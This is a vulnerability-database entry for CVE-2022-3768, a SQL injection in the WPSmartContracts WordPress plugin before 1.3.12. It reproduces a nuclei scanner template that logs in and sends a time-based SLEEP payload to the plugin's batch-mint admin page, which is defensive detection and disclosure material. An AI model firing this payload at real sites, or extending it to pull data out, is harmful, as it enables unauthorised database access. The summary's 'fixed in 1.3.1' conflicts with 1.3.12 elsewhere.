WordPress WPSmartContracts <1.3.12 - SQL Injection

🗓️ 01 Jul 2026 03:36:47 · Reported by ProjectDiscovery · Type: nuclei · 🔗 github.com

WordPress WPSmartContracts <1.3.12 - SQL Injection. The vulnerability allows unauthorized SQL queries, data access, and data manipulation. Fixed in version 1.3.1

Related

Reporter | Title | Published | Family
Circl | CVE-2022-3768 | 28 Nov 2022 16:28 | circl
CNNVD | WordPress plugin WPSmartContracts SQL injection vulnerability | 28 Nov 2022 00:00 | cnnvd
CNVD | WordPress WPSmartContracts plugin SQL Injection Vulnerability | 30 Nov 2022 00:00 | cnvd
CVE | CVE-2022-3768 | 28 Nov 2022 13:47 | cve
Cvelist | CVE-2022-3768 WPSmartContracts < 1.3.12 - Author+ SQLi | 28 Nov 2022 13:47 | cvelist
NVD | CVE-2022-3768 | 28 Nov 2022 14:15 | nvd
OSV | CVE-2022-3768 | 28 Nov 2022 14:15 | osv
Patchstack | WordPress WPSmartContracts plugin <= 1.3.11 - Auth. SQL Injection (SQLi) vulnerability | 7 Nov 2022 00:00 | patchstack
Prion | Sql injection | 28 Nov 2022 14:15 | prion
Positive Technologies | PT-2022-24039 · WordPress · Wpsmartcontracts | 28 Nov 2022 00:00 | ptsecurity

id: CVE-2022-3768

info:
  name: WordPress WPSmartContracts <1.3.12 - SQL Injection
  author: Hardik-Solanki
  severity: high
  description: |
    WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 1.3.12
  reference:
    - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
    - https://cve.report/CVE-2022-3768
    - https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-3768
    cwe-id: CWE-89
    epss-score: 0.03663
    epss-percentile: 0.88246
    cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpsmartcontracts
    product: wpsmartcontracts
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        @timeout: 15s
        GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=7'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "Batch Mint NFTs")'
        condition: and
# digest: 490a00463044022021edaf38116ee537847cd57d26e744082e3e33d129cb62ba60de15ad9c1daeee02200eab59593a510748144559b65ebf087ccd76a08b4f2f4182e2ae5ebf81eac4db:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (current)
Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 8.8
EPSS: 0.03663